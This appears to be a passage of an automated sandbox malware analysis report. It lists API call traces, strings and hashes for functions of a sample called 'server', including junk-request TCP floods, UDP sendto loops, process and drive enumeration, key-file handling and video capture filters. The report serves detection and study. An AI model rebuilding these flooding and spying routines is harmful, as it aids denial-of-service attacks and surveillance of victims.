                                  • Part of subcall function 100040D0: rand.MSVCRT ref: 100040D9
                                • sprintf.MSVCRT ref: 100069AF
                                  • Part of subcall function 100067F0: GetInputState.USER32 ref: 100067F3
                                  • Part of subcall function 100067F0: GetCurrentThreadId.KERNEL32 ref: 100067FF
                                  • Part of subcall function 100067F0: PostThreadMessageA.USER32(00000000), ref: 10006806
                                  • Part of subcall function 100067F0: GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 10006817
                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 100069D9
                                • Sleep.KERNEL32(00000064), ref: 100069DD
                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 100069FF
                                • Sleep.KERNEL32(00000064), ref: 10006A03
                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 10006A25
                                • Sleep.KERNEL32(000003E8), ref: 10006A2C
                                • TerminateProcess.KERNEL32(?,00000000), ref: 10006A35
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CreateSleepThread$Messagesprintf$CountCurrentDirectoryExitInputPostStateSystemTerminateTickUserrand
                                • String ID: "%s" "%s?abc=%d%d%d%d"$D
                                • API String ID: 172844161-298079244
                                • Opcode ID: 996b448a330ea39742fb996c5da3b8e9d5bac2eccd2bcf86842a313de783662b
                                • Instruction ID: dee45d619fc2e394e3d2b66f1065b8d82e3a70ab678904dd2a9156dbc98c66a4
                                • Opcode Fuzzy Hash: 996b448a330ea39742fb996c5da3b8e9d5bac2eccd2bcf86842a313de783662b
                                • Instruction Fuzzy Hash: C44185B26043856EF710D754CC41FB777A9FBC4704F100929F7899A281DAB5A9098B63
                                Function 100097A0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 127filestringCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100097B4
                                  • Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                  • Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                  • Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
                                  • Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
                                  • Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 1000986B
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 1000987E
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 10009892
                                • lstrlen.KERNEL32(?), ref: 100098A0
                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 100098A9
                                • lstrlen.KERNEL32(?,?,00000000), ref: 100098CF
                                • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 100098D8
                                • CloseHandle.KERNEL32(00000000), ref: 100098DF
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Resource$??2@lstrlen$??3@CloseCreateDirectoryFindHandleLoadLockPointerSizeSystemWrite
                                • String ID: .key$XXXXXX
                                • API String ID: 3558955628-2601115946
                                • Opcode ID: d24516f02ea8cd83adf64a079234290d1210b910ff9b8bcf6310260086aca102
                                • Instruction ID: d999d40ade01bfd780963a7e4da00662e15d7ecd24b9ce1fec2d34a8ea1a0eed
                                • Opcode Fuzzy Hash: d24516f02ea8cd83adf64a079234290d1210b910ff9b8bcf6310260086aca102
                                • Instruction Fuzzy Hash: E0313B722406441BE728DA749C9AB6B368BEBC5371F14072DFA67872D1DEE49D098350
                                Function 1000D500 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 99libraryloadersleepCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 1000D50E
                                • GetProcAddress.KERNEL32(00000000,closesocket), ref: 1000D51E
                                • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 1000D57A
                                • GetProcAddress.KERNEL32(00000000,send), ref: 1000D586
                                • GetLastError.KERNEL32(?,?,00000000), ref: 1000D5BA
                                • CloseHandle.KERNEL32(00000000), ref: 1000D5FB
                                • Sleep.KERNEL32(00000002), ref: 1000D611
                                • FreeLibrary.KERNEL32(?), ref: 1000D628
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Library$AddressLoadProc$CloseErrorFreeHandleLastSleep
                                • String ID: closesocket$send$ws2_32.dll
                                • API String ID: 2554972651-2162363962
                                • Opcode ID: 7ecabd3abaaee7e7d6219c6ba1515479c9e7988b56b45e660df247fc14e0e3a4
                                • Instruction ID: 67dba68df69635aebfa3a3596635123a731ded8294c22980d7a7e8a666a99e77
                                • Opcode Fuzzy Hash: 7ecabd3abaaee7e7d6219c6ba1515479c9e7988b56b45e660df247fc14e0e3a4
                                • Instruction Fuzzy Hash: 6031E330104751ABF604EF68CC84B6F77E9FF89795F010A1AFA49D7185CB71E8008B61
                                Function 10004130 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networksleepthreadCOMMON
                                Download Yara Rule
                                APIs
                                • WSAStartup.WS2_32(00000202,?), ref: 10004144
                                • htons.WS2_32 ref: 1000416B
                                • inet_addr.WS2_32(1007DD2C), ref: 1000417B
                                • socket.WS2_32(00000002,00000001,00000000), ref: 1000419A
                                • connect.WS2_32(00000000,?,00000010), ref: 100041AA
                                • send.WS2_32(00000000,GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#,?,00000000), ref: 100041CF
                                • Sleep.KERNEL32(00000032,?,00000000), ref: 100041D8
                                • closesocket.WS2_32(00000000), ref: 100041E5
                                • RtlExitUserThread.NTDLL(00000000), ref: 100041F6
                                • closesocket.WS2_32 ref: 100041FD
                                Strings
                                • GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#, xrefs: 100041B7, 100041C9
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: closesocket$ExitSleepStartupThreadUserconnecthtonsinet_addrsendsocket
                                • String ID: GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#
                                • API String ID: 4272391932-4039768343
                                • Opcode ID: 68e5b576acd18c2c4b14ef7e3e27ec556b121b0e629d7d28d9c654a0c05f4b01
                                • Instruction ID: 045f70dc197dd2c2e97778d2da9c7e2bc6c5d128113408fc6fa20a61d9539879
                                • Opcode Fuzzy Hash: 68e5b576acd18c2c4b14ef7e3e27ec556b121b0e629d7d28d9c654a0c05f4b01
                                • Instruction Fuzzy Hash: 802129711053A05BF300DF34CC89BAA3BA9FF45750F10062DF5A6D61E1EBB49D49876A
                                Function 1000C540 Relevance: 18.1, APIs: 12, Instructions: 76stringprocessCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000C549
                                • ??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000), ref: 1000C559
                                • Process32First.KERNEL32(00000000,00000000), ref: 1000C56B
                                • GetLastError.KERNEL32(00000000,00000000), ref: 1000C574
                                • _strupr.MSVCRT ref: 1000C58D
                                • _strupr.MSVCRT ref: 1000C594
                                • strstr.MSVCRT ref: 1000C59A
                                • Process32Next.KERNEL32(?,00000000), ref: 1000C5B8
                                • _strupr.MSVCRT ref: 1000C5C2
                                • _strupr.MSVCRT ref: 1000C5C9
                                • strstr.MSVCRT ref: 1000C5CF
                                • Process32Next.KERNEL32(?,00000000), ref: 1000C5E2
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: _strupr$Process32$Nextstrstr$??2@CreateErrorFirstLastSnapshotToolhelp32
                                • String ID:
                                • API String ID: 3005159451-0
                                • Opcode ID: 23efa30b1931372c08988a04184d169330586e24b49372f407ec6eb3898f93af
                                • Instruction ID: c0712735c5d1058a8d10a1fcff2c42ee7888384913c1c0693e55bcc166550335
                                • Opcode Fuzzy Hash: 23efa30b1931372c08988a04184d169330586e24b49372f407ec6eb3898f93af
                                • Instruction Fuzzy Hash: 5D1106B69003552BF600D735AC85E9B7B9CDF803E6F04143AFD06D6201FA21FE5486B6
                                Function 00404F7F Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177COMMON
                                Download Yara Rule
                                APIs
                                • LCMapStringW.KERNEL32(00000000,00000100,0040642C,00000001,00000000,00000000,00000103,00000001,00000000,?,0040446F,00200020,00000000,?,00000000,00000000), ref: 00404FC1
                                • LCMapStringA.KERNEL32(00000000,00000100,00406428,00000001,00000000,00000000,?,0040446F,00200020,00000000,?,00000000,00000000,00000001), ref: 00404FDD
                                • LCMapStringA.KERNEL32(?,?,?,?,oD@ ,?,00000103,00000001,00000000,?,0040446F,00200020,00000000,?,00000000,00000000), ref: 00405026
                                • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,0040446F,00200020,00000000,?,00000000,00000000), ref: 0040505E
                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 004050B6
                                • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 004050CC
                                • LCMapStringW.KERNEL32(?,?,?,00000000,oD@ ,?,?,0040446F,00200020,00000000,?,00000000), ref: 004050FF
                                • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 00405167
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: String$ByteCharMultiWide
                                • String ID: oD@
                                • API String ID: 352835431-4270158488
                                • Opcode ID: 2afe8f83c1e32ad7c20cd3ef5f0d9ce625311a17c994b0e660629879fca01b21
                                • Instruction ID: cd81302389fada6b5ad7ddbf8cce1e057f1d7051e18c97d2a0019bd6d71d522c
                                • Opcode Fuzzy Hash: 2afe8f83c1e32ad7c20cd3ef5f0d9ce625311a17c994b0e660629879fca01b21
                                • Instruction Fuzzy Hash: 04517B31900619EBCF228F94DD45AAF7FB9EB48750F10413AF915B52A0D37A8D21DFA8
                                Function 10012B60 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 108networkCOMMON
                                Download Yara Rule
                                APIs
                                • InternetOpenA.WININET(Mozilla/4.0 (compatible),00000000,00000000,00000000,00000000), ref: 10012B86
                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 10012BB4
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: InternetOpen
                                • String ID: MZ$Mozilla/4.0 (compatible)
                                • API String ID: 2038078732-1122958964
                                • Opcode ID: 1b603d2b6cb4bb4a2b0791728ef789fd7c844eea8b35218b3130136ed5bb0548
                                • Instruction ID: 8c63eb6a41a225431111a82eac4f27fd10ac0d63006a227f2e92e921feb65f24
                                • Opcode Fuzzy Hash: 1b603d2b6cb4bb4a2b0791728ef789fd7c844eea8b35218b3130136ed5bb0548
                                • Instruction Fuzzy Hash: 3C31F5B1204359ABD210DF25DC80E9FBBEDFBC97A4F01092DF64097140D775E94987A6
                                Function 00401630 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 85COMMON
                                Download Yara Rule
                                APIs
                                • GetVersionExA.KERNEL32(?), ref: 0040164A
                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 00401698
                                • wsprintfA.USER32 ref: 004016CA
                                • GetFileAttributesA.KERNEL32(?), ref: 004016E6
                                • ExitProcess.KERNEL32 ref: 004016F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: AttributesDirectoryExitFileProcessVersionWindowswsprintf
                                • String ID: %s\SysTEM32\sysedit.exe$H$o$s$t
                                • API String ID: 2470598139-87740868
                                • Opcode ID: 251448df7b50cf4df5bb98e08941e18823b330a20de11f881ffddb0b690df73d
                                • Instruction ID: 47bd58147c64a949f084ac4d6b8b2736ebceef07ebb8f42e32fac6c8f9cf200e
                                • Opcode Fuzzy Hash: 251448df7b50cf4df5bb98e08941e18823b330a20de11f881ffddb0b690df73d
                                • Instruction Fuzzy Hash: 02210830E00248BFDB10C768DC087CEBBB96F46304F0044E9E28AB22D1DBB45B88CA57
                                Function 10007F90 Relevance: 16.6, APIs: 11, Instructions: 136stringCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CharNext$free$AttributesCreateDirectoryErrorFileLastlstrcpylstrlenmalloc
                                • String ID:
                                • API String ID: 3289936468-0
                                • Opcode ID: 91c087a2b93d1311ec0e6759ce73b84a9ff3fbed6c289464c935a959dac4fcdd
                                • Instruction ID: 2210af07b0f8d49035197b9e4786ebf24fa4771591eb8ab4f4da9f9fb379daaa
                                • Opcode Fuzzy Hash: 91c087a2b93d1311ec0e6759ce73b84a9ff3fbed6c289464c935a959dac4fcdd
                                • Instruction Fuzzy Hash: E341C571C047A59FF7A1CF188C447AABBE9FB067E0F10016AD9E193244D3741A4ADBA1
                                Function 1000CF40 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 134fileCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000CF72
                                  • Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                  • Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                  • Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
                                  • Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
                                  • Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 1000D029
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 1000D038
                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 1000D041
                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 1000D054
                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000), ref: 1000D07C
                                • CloseHandle.KERNEL32(00000000), ref: 1000D085
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileResource$??2@??3@$CloseCreateDirectoryFindHandleLoadLockReadSizeSystem
                                • String ID: .key$XXXXXX
                                • API String ID: 710762369-2601115946
                                • Opcode ID: f060dc9d51e19fff5d6fe7fdc321299b3120c7788261040069954f175d4ea1c6
                                • Instruction ID: 0c7bdf6f6cfedffafb096b417f82647280419507c62535d74d6fa5ee32727597
                                • Opcode Fuzzy Hash: f060dc9d51e19fff5d6fe7fdc321299b3120c7788261040069954f175d4ea1c6
                                • Instruction Fuzzy Hash: A83137726006082FE318DA749C55A6B7A8BFBC5370F140B2DFA67C72D1EDE59D0D82A1
                                Function 10008360 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 130stringCOMMON
                                Download Yara Rule
                                APIs
                                • GetLogicalDriveStringsA.KERNEL32 ref: 10008381
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 100083D7
                                • SHGetFileInfo.SHELL32(?,00000080,?,00000160,00000410), ref: 100083F5
                                • lstrlen.KERNEL32(?), ref: 10008409
                                • lstrlen.KERNEL32(?), ref: 10008417
                                • GetDiskFreeSpaceExA.KERNEL32(00000001,?,?,00000000), ref: 10008436
                                • GetDriveTypeA.KERNEL32(?), ref: 1000847D
                                • lstrlen.KERNEL32(?), ref: 100084E7
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Drive$DiskFileFreeInfoInformationLogicalSpaceStringsTypeVolume
                                • String ID: g
                                • API String ID: 2496086942-30677878
                                • Opcode ID: b1f0603da955b9deec9a7e30b8dcfd22e7aa198ea86b18fd6141ef5117c09393
                                • Instruction ID: 7a94a0694180289e9c46b8d804f7d8816f5e215d3c8a1403c1990a7dea9b0a38
                                • Opcode Fuzzy Hash: b1f0603da955b9deec9a7e30b8dcfd22e7aa198ea86b18fd6141ef5117c09393
                                • Instruction Fuzzy Hash: 4E41C4705083869FD715CF14C880A9BB7EAFBC8744F04492DF9C987251D7B4AA09CBA2
                                Function 10004DC0 Relevance: 15.1, APIs: 10, Instructions: 92memorynetworksleepCOMMON
                                Download Yara Rule
                                APIs
                                • WSAStartup.WS2_32(00000202,?), ref: 10004DD1
                                • WSASocketA.WS2_32 ref: 10004DEB
                                • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 10004E0E
                                • inet_addr.WS2_32(1007DD2C), ref: 10004E3D
                                • GetProcessHeap.KERNEL32(00000008,00001000), ref: 10004E4E
                                • RtlAllocateHeap.NTDLL(00000000), ref: 10004E55
                                  • Part of subcall function 10004D70: GetCurrentProcessId.KERNEL32 ref: 10004D7F
                                • GetTickCount.KERNEL32 ref: 10004E93
                                • sendto.WS2_32(00000000,00000000,00001000,00000000,?,00000010), ref: 10004EBA
                                • Sleep.KERNEL32(00000064,?,?,00000001), ref: 10004ECF
                                • RtlExitUserThread.NTDLL(00000000,00000001), ref: 10004EE1
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: HeapProcess$AllocateCountCurrentExitSleepSocketStartupThreadTickUserinet_addrsendtosetsockopt
                                • String ID:
                                • API String ID: 4173591058-0
                                • Opcode ID: a4ec68e89468125ac0a4209f7c8bae31b74d80ca69eebe526d17ee31116ff516
                                • Instruction ID: c5a2debfd89a1f44daedc798f5d2e11e4375d7b03d2956684dd0a07df8b0980b
                                • Opcode Fuzzy Hash: a4ec68e89468125ac0a4209f7c8bae31b74d80ca69eebe526d17ee31116ff516
                                • Instruction Fuzzy Hash: 263138706403506BF310DF20CC4ABA677E9FF85B80F008529F695AA1D0EBF498098B26
                                Function 10068F60 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 317comCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 10069530: CoCreateInstance.OLE32(10077228,00000000,00000001,10077168,?,?,?,?,?,10068F83,?,?), ref: 1006954E
                                  • Part of subcall function 10069530: CoCreateInstance.OLE32(10077238,00000000,00000003,10077158,?,?,?,?,?,10068F83,?,?), ref: 10069562
                                • CoCreateInstance.OLE32(10077198,00000000,00000001,100771A8,?,?,Capture Filter,?,?,?,?), ref: 10068FCD
                                Strings
                                Memory Dump Source
